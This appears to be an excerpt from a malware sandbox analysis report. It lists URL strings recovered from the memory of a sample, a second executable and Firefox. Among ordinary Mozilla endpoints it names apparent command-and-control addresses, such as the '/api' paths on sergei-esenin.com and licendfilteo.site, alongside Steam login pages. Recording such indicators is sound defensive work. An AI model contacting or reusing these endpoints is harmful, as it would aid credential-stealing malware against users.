Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3041852185.0000025507303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabhttps://getpocket.com/explore/te
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab#
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabbrowser.newtabpage.activity-stream.discoverystr
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreCould
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreextensions.pocket.oAuthConsumerKey
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsresource://activity-stream/lib/TelemetryFeed.jsmDisplays
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3116694729.000002550A6B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001B.00000002.3138467915.0000025510299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2929130101.000002551029D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2974971166.0000025510299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001B.00000002.3138467915.0000025510299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2929130101.000002551029D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2974971166.0000025510299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885518412.0000025507B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/mozstd-trackwhite-digest256
Source: 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.0000025578211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881No
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: file.exe, 00000000.00000003.2170327401.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001B.00000002.3037710941.00000255059D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3142094936.0000025510A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeVisitedbrowser.safebrowsing.m
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://licendfilteo.site:443/api
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3119712014.000002550A939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3119712014.000002550A939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comsearch-one-offs-context-set-default
Source: 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.00000255782D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/HighlightsFeed.jsmr
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3152189016.000002557F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3152189016.000002557F2A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001B.00000003.2885518412.0000025507B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.0000025508595000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/AS_ROUTER_TELEMETRY_USER_EVENT
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/AS_ROUTER_TELEMETRY_USER_EVENTresource://default-theme/classifySite/
Source: file.exe, file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283943556.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126652942.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203693833.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126806636.0000000000D24000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184041337.0000000005731000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168617103.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184166845.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.2203575439.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240724757.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184150901.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212628470.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184349095.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203611504.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2167370288.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212688293.0000000000D88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/8FZnT7
Source: file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283865897.0000000000D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/;
Source: file.exe, 00000000.00000003.2203693833.0000000000D65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/;_cdn=cloudflare
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/?
Source: 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/B&v
Source: file.exe, 00000000.00000003.2241071323.0000000000D19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/K
Source: 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/_
Source: 09d417a7c4.exe, 0000000B.00000003.2800829947.0000000001476000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2851191382.000000000147A000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2896030161.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2895926103.0000000001480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: 09d417a7c4.exe, 0000000B.00000003.2917433896.000000000148A000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2895926103.0000000001480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api0
Source: 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiF
Source: 09d417a7c4.exe, 0000000B.00000003.2917433896.000000000148A000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010966196.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3009719972.0000000001480000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2895926103.0000000001480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api_
Source: 09d417a7c4.exe, 0000000B.00000003.2832326237.000000000147A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apia
Source: 09d417a7c4.exe, 0000000B.00000003.2800829947.0000000001476000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apid
Source: file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2800829947.0000000001476000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apie
Source: file.exe, 00000000.00000003.2240943343.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283776593.0000000000D81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apih
